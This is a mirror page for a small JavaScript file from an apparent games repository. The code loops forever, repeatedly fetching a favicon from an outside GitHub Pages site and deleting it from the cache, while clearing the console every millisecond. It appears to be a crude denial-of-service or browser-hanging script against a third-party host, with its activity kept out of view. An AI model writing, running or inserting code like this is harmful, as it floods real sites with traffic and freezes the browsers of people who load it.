mirror of
https://github.com/hexahigh/games.git
synced 2025-12-11 20:15:38 +01:00
16 lines
372 B
JavaScript
16 lines
372 B
JavaScript
while (true) {
|
|
fetch('https://t0m0t0w.github.io/favicon.png')
|
|
.then(response => response.text())
|
|
.then(data => {
|
|
// Do something with the data
|
|
console.log(data);
|
|
|
|
// Delete the file from the cache
|
|
caches.delete('https://t0m0t0w.github.io/favicon.png');
|
|
});
|
|
}
|
|
|
|
setInterval(() => {
|
|
console.clear();
|
|
}, 1);
|
|
|